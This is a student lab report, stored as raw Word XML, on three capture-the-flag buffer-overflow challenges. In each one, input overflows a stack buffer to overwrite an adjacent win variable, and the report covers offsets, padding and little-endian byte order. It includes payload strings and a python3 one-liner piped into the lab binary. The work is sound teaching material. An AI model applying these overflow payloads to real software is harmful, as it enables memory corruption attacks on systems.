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53C4853"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Binary Exploitation Lab Report: Variable Control Challenges</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="73D544FA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Objective</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="378A46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goal of these exercises was to understand how stack-based buffer overflows can be used to corrupt adjacent variables in memory and alter program behavior. Rather than immediately targeting return addresses, these challenges focused on modifying local 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ariables stored after an input buffer.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="07049C86"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Round 1: Simple Variable Control</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2C16C439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Vulnerability Analysis</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="152D60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vulnerable structure was:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="123300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struct</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0DDA3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3120BF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char input[68];</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="48705D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int win_variable;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="76EE92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 data;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="3AAB65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57102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input was read using:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="467D61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read(0, &amp;data.input, 4096);</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="734E99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8E07E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program allowed up to 4096 bytes of input even though the buffer was only 68 bytes long.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0A7FAD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created a classic stack buffer overflow.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0A313191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Exploitation Strategy</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="199BD3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program contained the following check:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="64BE09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(data.win_variable)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2E9955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36C99C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win();</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2C313C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E442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2BA60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value of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">win_variable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only needed to be non-zero.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="217B2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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">win_variable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was located directly after the input buffer, I overflowed the buffer and overwrote the variable.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="3C0BC2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Payload layout:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5EFDD9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68 bytes padding</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7CAA42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+</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="75B337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 non-zero bytes</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="661742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4AC7C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14FF55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"A"*68 + "\x01\x00\x00\x00"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="07D1E2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B1CCE70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Result</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="431F14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overflow successfully changed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">win_variable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from 0 to a non-zero value, causing the program to execute the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">win()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function and print the flag.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1069F5F0"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Round 2: Win Variable and Lose Variable</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="54E8AF0F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Vulnerability Analysis</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="541C33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structure was expanded:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="219F2E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struct</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="47E951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1B0521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char input[74];</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="67C512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int win_variable;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="3E22BB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int lose_variable;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="79E8A3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 data;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="34A7F8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09FA4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program checked:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="4138F8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(data.lose_variable)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="527E20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6FDF69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exit(1);</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="08251B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F43C5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3E56D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(data.win_variable)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7EC190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787364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win();</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="48E5C6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CDC92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3CB510F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Challenge</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5704B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difficulty increased because I needed to:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2BD0941E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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">win_variable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a non-zero value.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2EB6C764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Leave </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lose_variable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equal to zero.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="39E532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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lose_variable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became non-zero, the challenge would immediately terminate.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7EC91CD3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Exploitation Strategy</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5E2812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program disclosed memory offsets:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="3B8388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win_variable offset = 74</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="3E41E7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lose_variable offset = 78</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="43E313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8E66F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crafted a payload that stopped immediately after overwriting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">win_variable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1F234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6AC220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"A"*74 + "\x01\x00\x00\x00"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="11ED0B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3B6C211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Result</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="745EAB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overflow modified only the win variable while preserving the lose variable, successfully triggering the win condition.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="08FF4D1E"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Round 3: Exact Value Overwrite and Endianness</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="4E185565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Vulnerability Analysis</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="06025D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structure was:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="3E73B6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struct</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7B6CEB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094D12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char input[55];</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="07BDD8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int win_variable;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="01E481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int lose_variable;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2A5128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 data;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="61B6C2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33E92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win condition became:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5A72C4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(data.win_variable == 0x5485722b)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="6BAD4E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476412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win();</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5973C3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238E1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93BF8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Unlike previous rounds, any non-zero value would not work.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="6E1B23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variable had to equal the exact target value.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="192F3D1C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Memory Layout Discovery</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="352E82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program printed:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="139656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win_variable offset = 56</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="01767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lose_variable offset = 60</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="6EFFB0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20936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revealed that the compiler inserted one byte of padding after the 55-byte buffer for alignment purposes.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="532ED8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Layout:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="796939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55-byte buffer</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="399DC0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1-byte padding</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0052E2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4-byte win_variable</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="24BB75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4-byte lose_variable</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="518022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55F1320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Initial Failure</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="79553F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first attempted to type the payload manually into the terminal:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1D884F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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+rT</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="004F4E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AB805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stack dump showed:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5657AE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2b 72 54 0a</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="646B2F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4CDC4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 of:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="501B8F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2b 72 85 54</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2CD444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9163B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resulting value became:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="00493D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0x0a54722b</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="6F57B8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306EB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 of:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="436A3C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0x5485722b</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="36461F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B54CB9C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Root Cause</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="4F30A1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Two problems occurred:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0A04EBFC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byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0x85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could not be reliably entered through the keyboard.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="4B024D1C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Pressing Enter appended a newline character (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0a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to the payload.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="05738D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 of this, the overwrite failed.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="778AD373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Understanding Endianness</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="46DFAC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target value was:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="261B4D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0x5485722b</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2D519A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64386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x86-64 systems, integers are stored in little-endian format.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="663B68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Therefore, the bytes had to be written as:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="4408E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2b 72 85 54</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1B2324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592E1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rather than:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="48340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54 85 72 2b</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7813FE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175D3C2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Final Solution</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0E5944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generated the payload programmatically using Python:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="45AB5D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b"A"*56 + b"\x2b\x72\x85\x54"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="47E2AB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DEA9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piped it directly into the vulnerable binary:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1CF9B2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python3 -c 'import sys;sys.stdout.buffer.write(b"A"*56+b"\x2b\x72\x85\x54")' | ./binary-exploitation-var-control-w</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="762596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41FBF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ensured:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2DC3BD1F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Exact byte values were transmitted.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0C14C3EB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newline character was appended.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0B49C155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target value was written correctly.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730A99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2026-06-16T10:46:02Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>